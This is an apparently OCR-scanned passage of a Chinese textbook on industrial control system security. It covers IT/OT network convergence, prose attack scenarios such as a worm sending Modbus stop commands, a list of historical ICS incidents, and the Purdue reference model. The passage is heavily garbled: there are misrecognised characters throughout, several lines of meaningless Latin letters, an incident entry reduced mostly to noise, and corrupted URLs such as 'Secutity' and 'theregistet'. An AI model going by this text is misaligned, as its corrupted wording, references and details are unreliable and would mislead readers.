由 于 资产 所 有 者 看 到 了 网 络 融 合 市 来 的 好 处 ， 用 于 观察 和 改进 工业 过 程 的 技术 开始 加 速 友 展 。 这 些 技术 包括 : 记录 过 程 变量 及 其 变化 的 工业 实时 历史 数据 库 
(data historian) ， 制 造 执行 系统 (Manufacturing Enterprise Systems, MES) ， 企 业 资源 规划 系统 (Enterprise Resource Planning, ERP) ， 实 验 室 信 息 
管理 系统 (Laboratory Information Management Systems, LIMS) 等 等 。 这 些 系统 都 基于 常见 的 操作 系统 ， 比 如 Unix 操 作 系 统 和 微软 的 Windows 操 作 系 
统 ， 从 而 加 速 了 信息 技术 网 络 和 运营 技术 网 络 的 进一步 融合 ， 也 刺激 了 对 以 太 网 拷 术 (以 及 后 来 的 无 线 网 络 技术 ) 的 进一步 需求 ， 以 实现 对 工业 过 程 的 分 布 式 监 
视 和 控制 。 随 之 而 来 的 是 ， 原 本 在 隔离 网 络 中 几乎 完全 被 忽视 的 控制 系统 网 络 威胁 忽然 间 走 上 了 前 台 。 


然而 ， 仪 仪 是 网 络 融 合 所 市 来 的 连通 性 还 并 不 是 最 值得 关注 的 部 分 。 首 先 ， 这 些 威胁 并 不 仅 限 于 最 新 发 布 的 漏洞 。 工 业 网 络 中 大 量 系统 所 使 用 的 Windows 操 
作 系 统 版 本 已 经 多 年 甚至 数 十 年 未 曾 更 新 。 因 此 ， 这 些 系统 已 经 错过 了 无 数 个 微软 的 “周二 补丁 日 ”， 这 也 意味 着 其 中 人 存在 着 数 干 个 未 经 修复 的 漏洞 。 尽 管 这 些 
漏洞 早已 在 大 多 数 传统 上 系统 中 进行 了 修补 ， 任 何 针 对 这 些 漏洞 的 利用 尝试 都 很 可 能 无 功 而 返 ， 但 是 受 这 些 漏洞 影响 的 OT 系 统 却 会 显著 增加 暴露 的 机 会 。 


除了 标准 操作 系统 的 漏洞 之 外 ， 工 控 系 统 的 设备 、 协 议 及 应 用 程序 本 身 在 设计 之 初 也 都 没有 考虑 到 安全 问题 。 在 某 些 情况 下 工控 系统 设备 可 能 经 常会 出 现 故 
障 需 要 重启 或 完全 失效 无 法 工作 ， 而 这 些 情 况 在 IT 网 络 中 通常 被 看 作 是 正常 的 。 要 知道 ， 工 控 系统 应 用 程序 和 协议 最 初 在 设计 开 发 时 并 没有 采用 认证 和 加 密 机 制 
以 及 其 他 常见 网 络 安全 对 抗 措 施 等 方式 来 提供 安全 保障 。 


让 间 题 变 得 更 复杂 的 是 ， 这 些 系统 本 身 所 具有 的 关键 性 和 敏感 性 使 得 对 其 开展 补丁 修复 工作 较为 困难 ， 这 也 是 导致 工控 系统 的 安全 补丁 非常 过 时 的 一 个 主要 
原因 。 这 些 系统 中 的 很 大 一 部 分 属于 “高 可 用 性 ”系统 ， 在 定期 维护 时 间 窗 口 之 外 进行 天 机 来 安 六 更 新 和 补丁 程序 通常 是 不 现实 的 。 即 使 是 在 定期 维护 时 间 窗 口 
之 内 ， 许 多 传统 的 网 络 安全 措施 〈 例 如 反 病 毒 软件 、 安 全 更 新 和 补丁 ) 也 都 有 可 能 对 工控 系统 设备 和 网 络 产生 负面 影响 。 


最 后 ， 所 有 这 一 切 的 X 因 素 ( 即 未 知 因素 ) 是 在 工控 系统 环境 中 经 常会 出 现 IT 技 术 能 力荐 过 的 情况 。 工 控 系 统 网 络 的 很 大 一 部 分 是 由 上 IT 设备 与 系统 和 连接、 维护 
和 操作 的 。 而 通常 工控 系统 中 的 这 些 资产 是 由 工控 系统 操作 员 和 工程 师 而 不 是 经 验 丰 富 的 IT 专业 人 员 来 维护 ， 这 融 很 可 能 导致 维护 、 配 置 过 程 中 出 现 各 种 弟 见 错 
误 以 及 系统 未 加 固 的 问题 ， 从 而 为 许多 潜在 的 脆弱 性 埋 下 了 隐患 。 这 些 脆弱 性 涵盖 了 从 唾 手 可 得 的 漏洞 到 天 键 致 命 的 漏洞 等 各 种 级 别 ， 而 这 些 漏洞 通 冲 都 不 会 存 
在 于 当今 典型 的 |T 架 构 之 中 。 


我 们 将 在 后 续 章节 中 详细 讨论 这 些 问题 。 至 少 我 们 现在 已 经 知道 : 工业 控制 系统 的 运行 不 同 于 IT 系统 ， 工 业 控制 系统 的 健壮 性 也 不 如 IT 系统 。 事 实 上 ， 有 许多 
现实 状况 、 系 统 弱 点 和 脆弱 性 可 能 导致 工业 控制 系统 出 现 故 障 而 无 法 运行 。 


1.1.2 JAR: 这 将 导致 什么 呢 


当 我 们 考虑 这 一 类 故障 在 具有 强烈 化 学 反应 、 高 温 高 压 和 机 械 部 件 的 工业 过 程 中 市 来 的 潜在 影响 时 ， 我 们 也 必须 考虑 它们 对 人 身 安 全 、 健 康 与 福利 的 潜在 影 
响 。 在 一 些 情况 下 ， 系 统 故 障 也 可 能 会 对 环境 造成 影响 ， 例 如 化 学 品 或 石油 泄漏 ; 或 者 对 当地 经 济 造 成 影响 ， 例 如 大 规模 的 停电 。 而 所 有 的 这 些 情况 ， 都 可 能 会 
导致 政府 对 相关 企业 予以 罚款 并 提起 诉讼 ， 从 而 给 企业 带 来 经 济 损 失 ， 企 业 信誉 也 可 能 受到 影响 。 


一 些 工 业 安全 标准 例如 由 国际 自动 化 协会 (International Society of Automation, ISA) 提出 的 ISA-84 标 准 和 国际 电工 委员 会 (International 
Electrotechnical Commission, IEC) 提出 的 IEC-61508 标 准 ， 还 有 信息 集成 标准 例如 国际 自动 化 协会 提出 的 ISA-95 标 准 都 已 经 开始 着 手 解决 控制 系统 的 网 络 安 
全 问题 。 后 来 ，ISA-99 (现在 为 ISA-62443/IEC62443) 以 及 其 他 一 些 标准 规范 ， 比 如 北美 电力 可 靠 性 委员 会 (North American Electric Reliability 
Council, NERC) 提出 的 NERC CIP 和 美国 联邦 法 规 6CFR27， 还 有 美国 国土 安全 部 (Department of Homeland Security, DHS) 提出 的 化 工 设备 反 芍 怖 主义 
法 令 (Chemical Facility Anti-Terrorism Statutes, CFATS) ， 也 都 开始 着 手 解决 现代 工业 控制 系统 中 的 网 络 安全 问题 。 这 一 模式 的 转变 在 很 大 程度 上 是 因为 人 
们 越 来 越 广泛 地 认识 到 一 当前 ， 由 于 需要 在 不 确定 性 更 强 的 网 络 与 传统 IT 网 络 之 间 建 立 连接 ， 工 业 控 制 系统 实际 上 面临 着 设备 完整 性 和 功能 安全 性 的 双重 威胁 。 
当 工 控 系统 由 于 故障 未 能 执行 (或 者 对 其 予以 控制 使 其 难以 执行 ) 预定 功能 时 ， 可 能 导致 以 下 影响 : 


+ 灾难 性 的 功能 安全 故障 
在 环境 中 释放 有 害 物质 


` 生产 损失 


. 生产 效率 持续 低下 
. 失去 公众 信任 


而 底线 在 于 ， 现 代 工 控 系 统 网 络 安全 专业 人 员 知 道 他 们 所 做 的 工作 ， 以 及 每 个 资产 所 有 者 的 责任 都 是 为 了 确保 工业 过 程 的 安全 和 可 靠 运行 。 为 了 实现 这 一 
上 ， 工 控 系 统 安 全 的 专业 人 员 必 须 对 工业 过 程 如 何 运 行 、 系 统 之 间 如 何 通 信 以 及 如 何 处 置 威胁 ( 远 远 不 止 是 数据 丢失 问题 ) 等 方面 有 着 基本 的 了 解 。 通 常 ，IT 网 
络 专 业 人 员 需 要 来 解决 这 些 问题 。 他 们 不 得 不 面 对 当今 OT 环境 的 危险 情况 ， 并 被 提醒 诸如 确保 领带 远离 机 器 之 类 的 基本 教训 。 而 现在 ， 工 控 系 统 网 络 安 全 专业 人 


ACE TS RXR, FEM RG Te HS MGA oe RIEL. 


1.1.3 “理解 工控 系统 所 面临 的 现实 威胁 与 风险 


攻击 者 如 果 想 要 了 解 以 哪 种 方式 攻击 工控 系统 环境 才能 市 来 现实 风险 ， 他 需要 掌握 的 不 仅仅 是 如 何 利用 系统 漏洞 ， 还 必须 详细 了 解构 成 一 个 完整 工控 系统 所 
需要 的 各 个 组 成 部 分 、 以 及 系统 类 型 和 系统 及 用 的 网 络 协 议 。 因 为 ， 在 对 一 套 完整 工控 系统 进行 攻击 的 某 一 点 上 ， 与 针对 传统 的 网 络 、 软 件 和 操作 系统 的 漏洞 利 
用 技术 相 比 ， 充 分 了 解 如 何 操纵 物理 过 程 来 达成 攻击 目标 的 工程 知识 更 为 重要 。 考 虑 以 下 场景 : 


. 世界 各 地 的 资产 所 有 者 通常 都 会 下 载 厂商 补丁 ， 基 于 上 述 情况 ， 网 络 攻击 者 可 以 通过 修改 厂商 补丁 的 方式 来 部 署 蠕虫 。 该 蠕虫 可 以 在 TCP502 端 口上 测试 
Modbus 协 议 ， 然 后 向 它 可 以 找到 的 每 台 设 备 发 送 Modbus 协 议 的 stop 命 令 。 


. 本 地 竞争 对 手 可 以 获取 其 他 公司 安全 防护 水 平 薄弱 的 实验 室 信息 管理 系统 (LIMS) 的 访问 权限 ， 并 使 用 系统 中 存储 的 产品 质量 信息 帮助 自己 的 公司 制订 更 
加 有 效 的 竞争 策略 。 


` 通过 负责 电梯 控制 的 楼 宇 自动 化 系统 所 提供 的 开放 的 远程 支持 端口 ， 黑 客 可 以 侵入 支付 卡 系统 并 窃取 数 百 万 张 信 用 卡 信息 。 
ARR EMP SAS AMER OT RIM Tet] A, ABE, FRAGT ILS) KAT PHRMA. 


一 名 心怀 不 满 的 员工 想 要 给 自己 的 工厂 造成 经 济 损失 。 他 攻击 了 精 馏 塔 的 控制 系统 和 人 机 界面 ， 然 后 向 人 机 界面 上 的 操作 员 报 告 错误 的 数据 ， 和 致使 精 馏 塔 


低 效 运行 ， 最 终 导致 精 馏 塔 过 早 失 效 。 


` 攻击 者 开发 了 一 种 蠕 忠 ， 该 蠕虫 能 够 屏蔽 燃气 涡轮 发 电机 上 的 机 器 超速 保护 装置 。 该 蠕虫 通过 承包 商 的 笔记 本 电脑 和 U 盘 进入 到 了 多 个 控制 网 络 。 一 旦 部 署 
完成 ， 蠕 下 就 会 屏蔽 机 器 的 超速 保护 装置 ， 同 时 关闭 压缩 机 的 进 料 管 线 并 将 压缩 机 的 速度 设置 为 从 低 到 高 来 回 不 断 变化 。 这 些 行 为 导致 压缩 机 进入 喘 振 状态 ， 并 
且 几 乎 可 以 立刻 对 压缩 机 造成 毁灭 性 的 损伤 。 


听 起 来 有 些 牵 强 吗 ? 虽然 这 些 例子 可 能 看 起 来 很 普通 ， 上 述 攻 击 场景 也 可 能 在 形式 上 有 所 变化 ， 但 其 实 这 些 攻 击 场景 在 现实 中 都 的 确 已 经 友 生 了 (我 们 在 这 
里 修改 并 模糊 了 一 些 细节 以 保护 “无 境 的 受害 者 ”) 。 在 所 有 的 这 些 实例 中 ， 攻 击 者 借助 自己 掌握 的 多 学 科 知 识 ， 在 多 个 层次 上 对 现代 工控 系统 环境 友 起 了 多 维 
EKE. 


我 们 现在 将 开始 考察 现代 工控 系统 ， 以 对 其 每 个 层次 上 的 各 种 组 件 有 所 了 解 。 
记录 在 案 的 网 络 攻击 事件 
以 下 是 一 些 重大 工控 系统 网 络 相关 事件 的 列表 。 


- Worcester 机 场 通信 中 断 事 件 1997 年 3 月 ， 马 萨 诸 塞 州 Worcestet 市 的 一 名 少年 ， 使 用 连接 到 公共 交换 电话 网 的 拨号 调制 解 调 器 禁用 了 该 网 络 中 的 一 部 分 设 
备 。 这 导致 Wotcestetf 机 场 控 制 塔台 、 机 场 安检 部 门 、 消 防 部 门 、 气 象 服务 部 门 和 机 场 运营 商 的 电话 业务 中 断 。 此 外 ， 控 制 塔台 的 无 线 电 主 发 射 机 和 局 动 跑道 灯 的 
另 一 发 射 机 也 被 关闭 ， 同 时 关闭 的 还 有 一 台 连 接 到 用 于 监视 飞行 轨迹 的 控制 器 的 打印 机 。 附 近 Rutland 镇 上 的 600 个 家 庭 和 企业 的 电话 业务 也 在 此 次 攻击 中 中 断 。 


(http://www.cnn.com/TECH/computing/9803/18/juvenile.hacker/index.html) 


- Maroochy shire 污 水 泄漏 事件 20007 FAK, AKA EE AE AE LEAR, APA A G AAE ee) TE HRM, AS 
EBRKRAAA ANH BE, RERA EILEAR SK AIA, ALR EARRA NAA KARIR) A RKK Z. RGR TBD KRY UTR, FR 
LEIGH RSA HR, RIG UL Fe A HER T 24204000 FE RAAK. (http://csrc.nist.gov/groups/SMA/fsma/ics /documents /Maroochy-Water- 


Setvices-Case-Study_report.pdf and http: //www.theregistet.co.uk/2001/10/31/hacker_jailed_for_tevenge_sewage/ ) 


Davis-Besse 核 电厂 事件 2003 年 8 月 ， 美 国 核 管理 委员 会 确认 ， 在 2003 年 1 月 ， 一 种 被 称 为 Slammet 的 Mictosoft SQL Servet 蠕 虫 病毒 感染 了 位 于 俄 玄 俄 州 奥 克 
港 闲置 Davis-Besse 核 电站 中 的 一 个 私人 计算 机 网 络 ， 禁 用 了 功能 安全 监控 系统 近 5 小 时 。 此 外 ， 攻 击 还 导致 工厂 的 过 程 计 算 机 出 现 故 障 ， 大 约 6 小 时 之 后 才 恢 复工 
作 。 据 报告 ， 由 于 Slammet 蠕 末 的 传播 速度 非常 快 ， 导 和 致 控制 系统 流量 阻塞 ， 至 少 还 有 其 他 5 个 公用 设施 的 控制 网 络 通信 受到 了 影响 。 


(http: //www.secutityfocus.com/news/6767 ) 


- Zotob 早 虫 事件 ”2005 年 8 月 ， 一 轮 互 联网 蠕虫 病毒 攻击 了 戴 姆 勒 -克莱斯勒 公 司 在 美国 的 13 家 汽车 制造 厂 ， 导 致 他 们 被 迫 停 工 将 近 一 个 小 时 ， 直 到 微软 
Windows 操 作 系 统 打 上 补丁 之 后 才 恢 复工 作 。 伊 利 诺 伊 州 、 印 第 安 纳 州 、 威 斯 康 星 州 、 俄 玄 俄 州 、 特 拉 华 州 和 密 歌 根 州 的 工厂 也 被 连 关 停 。 虽 然 蠕 忠 感 染 的 主要 对 
象 是 Windows2000 系 统 ， 但 它 也 影响 了 一 些 早期 版 本 的 Windows XP 系统 。 其 感染 症状 包括 计算 机 反复 关机 与 重启 。Zotob 蠕 忠 及 其 变种 还 造成 重型 设备 制造 商 卡 特 
彼 勒 公司 、 飞 机 制造 商 波 音 公 司 和 美国 几 家 大 型 新 闻 机 构 的 计算 机 运行 中 断 。 (http://www.eweek.com/c/a/Secutity/Zotob-PnP-Worms-Slam-13-DaimlerChrysler- 


Plants ) 


- Stuxnet 旺 虫 ”Stuxnet 是 一 款 运 行 在 Windows 操 作 系 统 之 上 的 计算 机 蠕虫 ， 于 2010 年 7 月 发 现 ， 该 蠕虫 专门 攻击 工业 软件 和 设备 。Stuxnet 蠕 虫 在 早期 传播 过 
程 中 随意 性 很 强 ， 但 其 中 包含 非常 专业 的 恶意 代码 载荷 ， 其 攻击 载荷 被 设 定 为 只 针对 用 于 控制 、 监 控 某 一 特殊 工业 过 程 的 特定 SCADA 系 统 。 


(http://en.wikipedia.org/wiki/Stuxnet) 


- 针对 面向 互联 网 的 控制 系统 的 暴力 攻击 ”2013 年 2 月 22 日 ， 工 业 控 制 系统 -网 络 应 和 急 响 应 小 组 (ICS-CERT) 收 到 了 一 份 来 自 一 家 压气 站 老板 的 报告 ， 报 告 指 
出 出 现 越 来 越 多 的 暴力 攻击 党 试 对 其 过 程控 制 网 络 进 行 访问 。 经 过 取证 ， 发 现 了 10 个 独立 IP， 其 间 还 接 到 了 其 他 天 然 气 管道 业主 类 似 性 质 的 电话 ， 并 进而 确定 了 
另外 39 个 相关 IP。 日志 分 析 显 示 攻 击 从 2013 年 1 月 16 日 开始 ， 但 自 2013 年 3 月 8 日 以 后 再 没有 收 到 任何 报告 。 


. Shamoon 有 恶意 代码 ”作为 世界 第 八大 炼油 厂 的 沙特 阿美 石油 公司 曾经 遭受 过 针对 其 精炼 设备 的 恶意 代码 攻击 。 这 款 被 称 为 Shamoon 的 恶意 代码 会 履 盖 被 攻 
击 系统 的 主 引 导 记 录 、 分 区 表 和 其 他 一 些 随 机 数据 文件 ， 从 而 导致 整个 系统 无 法 使 用 。 (http://ics-cert.us-cert.gov/sites/default/files/Monitors/ICS- 


CERT_Monitor_Sep2012.pdf) 


` 对 德国 钢铁 厂 的 攻击 “ 2014 年 ， 黑 客 操纵 并 破坏 了 德国 一 家 钢铁 厂 的 控制 系统 ， 致 使 高 炉 不 能 正常 关闭 ， 最 终 造 成 严重 损坏 ， 虽 然 钢铁 厂 并 未 就 其 损害 程 


度 进行 说 明 。 (http://www.wired.com/2015/01/german-steel-mill-hack-destruction/ ) 


. 乌克兰 电力 中 断 事件 2015 年 12 月 23 日 ， 乌 克 兰 的 Prykatpattya Oblehetgo 和 Kyivo-blenetgo 能 源 设施 遭 到 攻击 致使 运行 中 断 ， 导 致 8 万 余 名 用 户 以 及 至 少 7 个 
110kKV 变 电站 和 23 个 35kKV 变 电站 电力 中 断 长 达 6 小 时 。 这 起 事件 已 被 证 实 是 一 次 有 组 织 的 网 络 攻击 。 
(http: //www.theregistet.co.uk/2016/01/15/malware_clearly_behind_ukraine_power_outage_sans_utility_expert_says/and https://ics.sans.org/blog/2016/01/09/confirmation- 


of-a-coordinated-attack-on-the-ukrainian-power-erid) 


dpa S(t AEM —ABAKRK (9 英尺 ) 机 械 辟 的 活动 SCADA 网 络 进行 ping 扫 描 时 ， 注 意 到 其 中 有 一 个 机 械 辟 正在 活动 并 且 摆 动 幅度 在 180“ 左 右 。 
而 在 启动 bing 扫 描 之 前 ， 机 械 辟 的 控制 器 原本 处 于 待机 模式 。 在 另 一 次 事件 中 ， 出 于 整理 设备 清单 的 目的 ， 工 作 人 员 对 某 一 工控 系统 网 络 进行 ping 扫 描 以 识别 连接 
到 网 络 中 的 所 有 主机 ， 但 最 终 却 导 致 加 工厂 中 控制 集成 电路 生产 的 系统 暂停 工作 。 该 项 测试 导致 价值 5 万 美元 的 晶 圆 被 损坏 。 (http://eneregy.sandia.gov/wp/wp- 
content/ gallery /uploads/sand_2005_2846p.pdf and http: / /www.sandia. gov /scada/documents/sand_2005_2846p.pdf) 


. 渗透 测试 事件 ”一 家 天 然 气 公司 聘请 了 一 家 IT 安全 咨询 机 构 在 其 公司 的 IT 网 络 上 进行 渗透 测试 。 而 该 咨询 机 构 不 经 意 间 进入 了 直接 同 SCADA 系 统 相 连接 的 
网 段 。 随 后 ， 渗 透 测 试 锁定 了 SCADA 系 统 ， 寻 致 该 公司 在 长 达 4 小 时 的 时 间 内 不 能 通过 管道 输送 天 然 气 ， 结 果 造 成 客户 服务 中 断 了 4 小 时 。 


(http://energy.sandia.gov/wp/wp-content/ gallery /uploads/sand_2005_2846p.pdf) 


如 果 想 要 了 解 更 多 有 关 工 控 系 统 网 络 安全 相关 事件 的 信息 ， 从 ICS-CERT (https://ic-cert.us-cert.gov/) 开始 了 解 是 一 个 不 错 的 选择 ， 也 可 以 进行 一 些 简 单 的 
Google 搜 索 o Kim Zettet 撰 写 的 《Countdown to Zero Day: Stuxnet and the Launch of the World’ s First Digital Weapon» (Crown, 2014) 一 书 也 针对 大 多 数 公 开 记 录 


在 案 的 同 工 控 系 统 有 关 的 网 络 安全 事件 、 恶 意 代码 等 内 容 提 供 了 一 张 非 常 详尽 的 时 间 表 和 相关 的 统计 数据 。 


1.2 ”工业 控制 系统 概述 


本 书 的 目的 并 不 在 于 就 工业 控制 系统 、 设 备 、 架 构 等 诸多 细节 给 读者 讲 一堂 课 。 这 些 系统 已 经 仓 任 了 相当 长 一 段 时 间 (相对 来 说 ) ， 对 于 这 些 细节 已 经 有 大 
量 参考 文献 和 出 版 物 进 行 了 介绍 。 因 此 ， 我 们 只 是 对 一 些 关 于 工业 控制 系统 确实 需要 了 解 的 知识 进行 说 明 ， 以 便 更 好 地 理解 书 中 提出 的 概念 ， 而 不 是 过 多 地 陷入 
细节 介绍 之 中 。 有 关 工 控 系 统 的 更 多 详细 信息 ， 我 们 将 提供 一 些 高 质量 的 资源 列表 供 读 者 参考 。 


工业 控制 系统 根据 其 功能 大 致 可 以 归 入 以 下 三 种 类 别 中 的 一 个 或 多 个 : 画面 、 监 视 和 控制 。 
1.2.1 EE 


画面 (View) 功能 即 观察 过 程 的 当前 状态 以 便 做 出 决策 。 画 面 是 一 种 被 动 行 为 ， 在 很 大 程度 上 依赖 于 与 人 的 交互 。 画 面 功 能 通常 在 控制 室内 实现 ， 由 操作 
员 、 管 理 员 ， 以 及 为 推动 业务 决策 而 需要 实时 信息 (来 自 工业 实时 历史 数据 库 或 其 他 系统 ) 的 其 他 业务 功能 (例如 财务 和 管理 功能 ) 进行 操作 。 


1.2.2 监视 
监视 (Monitor) 功能 就 是 监视 过 程 的 当前 状态 这些 状态 包括 液 位 、 温 度 、 阀 位 置 和 进 给 率 等 诸多 要 素 。 它 与 “ 男 面 ”功能 的 区 别 在 于 ， 监 视 功 能 还 包括 


报警 、 事 件 状态 ， 以 及 不 良 过 程 状态 警告 。 许 多 监视 功能 是 自动 实现 的 ， 并 不 需要 人 为 干预 。 监 视 功能 的 一 个 实例 是 安全 仪表 系统 (Safety Instrumented 
Systems, SIS) ，SIS 会 对 不 利 条 件 做 出 反应 ， 在 危险 影响 产生 之 前 将 过 程 恢复 到 安全 状态 。 


1.2.3 ”控制 


控制 (Control) 功能 是 一 个 神奇 的 功能 ， 它 的 作用 是 局 动 控制 圈 门 、 电 动机 以 及 引起 机 械 物理 状态 发 生变 化 的 其 他 组 件 并 对 其 加 以 控制 。 控 制 功能 既 可 以 在 
操作 员 的 干预 下 驱动 ， 也 可 以 根据 逻辑 状态 的 变化 实现 自动 驱动 。 这 一 点 正 是 OT 同 IT 的 主要 区 别 。 在 IT 中 ， 我 们 使 用 信息 来 驱动 业务 决策 并 共享 信息 。 而 在 OFT 
中 ， 我 们 使 用 信息 来 驱动 物理 设备 。 控 制 层 才 是 控制 功能 的 用 武之 地 。 


在 过 去 (即便 由 于 “失误 ”， 有 些 控制 网 络 是 同 IT 网 络 互相 连通 的 ) ， 但 大 多 数控 制 网 络 都 是 与 IT 网 络 相 分 离 的 。 这 种 分 离 主要 是 因为 这 两 种 网 络 采用 了 不 
同 的 技术 ， 具 有 不 同 的 设计 功能 ， 并 且 当时 也 没有 在 物理 上 将 其 相互 连接 起 来 的 现实 需求 。 同 时 ， 在 很 多 情况 下 ， 也 没有 技术 手段 能 够 做 到 这 一 点 。 但 是 ， 现 在 
已 经 有 越 来 越 多 的 企业 正在 使 用 OT 数 据 来 创造 价值 并 推动 业务 决策 ， 再 加 上 与 基于 IP 协 议 族 的 网 络 之 间 的 融合 ， 共 同 推动 了 业务 IT 网 络 和 OT 网 络 之 间 的 互 连 。 


1.2.4 ”用 于 工控 系统 的 普 渡 参 考 模型 


普 渡 企 业 参 考 架 构 (Purdue Enterprise Reference Architecture, PERA) 模型 由 Theodore J.Williams 和 工业 - 普 渡 大 学 计算 机 集成 制造 联盟 (lIndustry- 
Purdue University Consortium for Computer Integrated Manufacturing) 的 成 员 于 20 世 纪 90 年 代 提 出 。 该 模型 被 ISA-99 标 准 (现在 的 ISA/IEC62443) 及 其 
他 工业 安全 标准 所 采纳 ， 并 且 被 用 作 工 控 系 统 网 络 分 段 的 关键 概念 。 普 渡 参 考 模型 (Purdue Reference Model) 在 工控 系统 行业 中 也 被 简称 为 “ 普 渡 模 
Æ" (Purdue Model) ， 广 泛 应 用 于 摘 述 大 型 工控 系统 中 所 有 重要 组 件 之 间 的 主要 相互 依赖 天 系 与 互 连 天 系 。 普 渡 模型 是 开始 了 解 OT 环 境 的 一 个 很 好 的 切入 


INNO 


因为 普 渡 模型 涉及 安全 策略 和 系统 架构 ， 在 后 续 章 节 我 们 将 更 进一步 地 详细 讨论 普 渡 模型 。 这 里 ,我 们 先 从 一 个 较 高 的 层次 了 解 一 下 它 的 主要 组 成 部 分 和 层 
次 ， 如 图 1-2 所 示 。 


第 5 层 : 企业 区 

企业 区 负责 供应 链 管理 。 诸 如 SAP 公 司 和 JD Edwards 公 司 开发 的 ERP 系 统 主要 用 来 理解 供需 关系 并 对 其 作出 响应 。 这 些 系统 从 所 有 从 属 系统 (通常 是 跨 多 个 
站 点 或 一 家 企业 ) 中 接收 数据 ， 通 过 查看 整体 的 供应 、 生 产 和 需求 情况 来 进行 工 单 管理 。 这 一 层次 一 般 不 与 工控 系统 直接 相连 ， 但 是 对 于 来 自 各 OT 网 络 和 工控 系 
统 组 件 的 准确 、 及 时 的 信息 有 着 明确 的 需求 。 

第 4 层 : 现场 业务 规划 和 组 织 

第 5 层 通常 部 署 于 公司 总 部 或 多 站 点 总 部 ， 第 4 层 则 表示 在 每 个 现场 、 车 间或 设施 中 控制 本 地 设施 运行 的 IT 系统 。 该 层 从 第 5 层 接收 工 单 ， 并 对 低层 的 运行 状况 
进行 监控 ， 进 而 了 解 运营 状态 ， 其 功能 还 包括 生产 进度 执行 情况 的 监控 、 本 地 工厂 的 问题 管理 ， 并 对 第 5 层 企业 系统 的 数据 进行 更 新 。 

工控 系统 非 军 事 区 层 


工控 系统 非 军事 区 层 (ICS-Demilitarized Zone, ICS-DMZ) 实现 IT 和 OT 之 间 的 信息 共享 。 这 是 一 个 由 NIST 的 网 络 安全 框架 、NIST800-82、NERC CIP 及 
ISA-62443 等 若干 工业 标准 所 推动 的 更 为 现代 化 的 架构 。1CS-DMZ 中 通常 包括 副本 服务 器 、 程 序 补丁 管理 服务 器 、 工 程 师 站 和 配置 变更 管理 系统 。DMZ 区 的 作用 
是 在 不 将 下 层 关键 组 件 直 接 暴露 给 攻击 者 的 情况 下 实现 IT 信 息 的 安全 交换 。 这 是 安全 规划 的 一 个 重点 领域 ， 我 们 将 在 后 面 的 章节 中 对 此 做 进一步 讨论 。 
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图 1-2 工控 系统 普 渡 参考 模型 


第 3 层 : 现场 制造 和 操作 控制 


第 5 层 和 第 4 层 仅 存在 于 网 络 中 的 1T 一 出，DMZ 区 则 作为 第 5 层 与 第 4 层 之 间 的 填充 ， 融 好 像 奥 利 奥 饼 干 中 的 夹心 层 一 样 ， 第 3 层 及 以 下 则 定义 并 包含 了 网 络 中 
OfT 一 侧 的 系统 。 第 3 层 通常 包含 SCADA 系 统 中 的 监控 部 分 ，DC3 的 画面 和 控制 访问 ， 或 者 对 OT 网 络 中 其 他 部 分 进行 监测 与 监控 的 控制 室 。 第 3 层 是 与 系统 进行 操 
作 员 级 交互 的 主要 层次 ， 操 作 员 可 以 查看 和 监控 过 程 事 件 和 趋势 ， 响 应 报警 和 事件 ， 使 用 诸如 工 单 维护 等 功能 来 管理 过 程 的 运行 时 间 和 可 用 性 ， 进 而 保障 产品 质 


en 


第 2 层 : 区 域 监控 


第 2 层 具有 许多 与 第 3 层 相同 的 功能 ， 但 第 2 层 主要 通过 过 程 单元 或 生产 线 级 的 功能 实现 对 过 程 中 单个 区 域 的 本 地 控制 。 该 层 区 别 于 其 他 层次 的 地 方 在 于 实际 的 
工控 系统 开始 在 本 层 出 现 ， 例 如 可 编程 序 控制 器 (PLC) 和 变频 驱动 器 (Variable Frequency Drive, VFD) 。 但 是 ， 第 2 层 中 的 主要 系统 还 包括 人 机 界面 
(HMI) 。 在 该 层 中 ， 可 以 通过 人 机 界面 面板 查看 实时 过 程 事件 和 操作 员 级 过 程 交互 的 本 地 画面 ， 并 通过 这 些 逻辑 驱动 组 件 实现 对 过 程 的 自动 控制 。 


第 1 层 : 基本 控制 


虽然 第 2 层 中 也 存在 PLC 和 VFD 等 设备 ， 但 第 1 层 才 是 这 些 设备 主要 出 现 的 地 方 。 第 1 层 中 包括 基本 过 程控 制 系统 (Basic Process Control 
Systems, BPCS) 。BPCS 系 统 是 适用 于 非 安全 相关 控制 系统 的 通用 术语 ， 主 要 执行 并 管理 以 下 功能 : 


- BPCS 系 统 在 可 配置 的 限制 ( 即 设 定点 ，set points) 范围 内 实现 对 过 程 的 控制 。 
BPCS 系 统 为 人 机 界面 提供 实时 数据 以 实现 同 过 程 的 操作 员 级 交互 。 
操作 员 与 该 层 BPCS 系 统 中 的 设 定 点 和 逻辑 进行 交互 ， 以 便 对 工厂 操作 进行 优化 。 


` 在 该 层 对 过 程 级 警报 和 事件 进行 管理 和 响应 。 第 2 层 依赖 于 来 自 第 3 层 及 以 上 各 层 的 信息 ， 用 于 调度 、 监 控 报 警 并 就 管理 过 程 的 实施 等 内 容 提 供 反 馈 。 


- BPCS 系 统 还 包括 传感器 、 执 行 器 、 继 电器 和 其 他 组 件 ， 用 于 对 过 程 值 进行 度量 并 将 结果 报告 给 PLC、DCS、SCADA ， 以 及 第 1 层 至 第 5 层 的 其 他 组 件 。 

SOR: 过 程 

这 一 层 也 被 称 为 受 控 设 备 层 (Equipment Under Control, EUC) ， 这 是 放置 第 1 层 所 控制 的 物理 设备 的 位 置 。 这 些 设备 包括 驱动 器 、 电 机 、 阀 门 以 及 构成 
实际 过 程 的 其 他 部 件 。 第 0 层 的 完整 性 对 于 安全 和 高 效 的 运营 至 关 重要 ， 因 为 这 是 现实 中 对 过 程 中 物理 设备 进行 操作 的 地 方 。 如 果 BPCS 和 受 控 设 备 无 法 正常 操 
作 ， 或 者 关于 过 程 状态 的 信息 不 准确 ， 那 么 BPCS 或 操作 员 就 无 法 准确 地 响应 过 程 条 件 。 

功能 安全 层 

所 有 这 些 层次 (第 0 ~ 5 层 ) 相互 交互 以 确保 过 程 执行 其 预先 设计 的 功能 。 根 据 所 参考 的 普 渡 参考 模型 的 改版 版 本 ， 会 发 现 功能 安全 层 (safety layer) 或 者 被 
包含 进 过 程 层 (BOR) 之 中 ， 作 为 过 程 层 中 的 一 部 分 ; 或 者 从 某 种 意义 上 说 在 逻辑 上 低 于 过 程 层 。 功 能 安全 层 就 是 当 硬件 故障 或 其 他 不 确定 的 不 利 条 件 导致 整个 
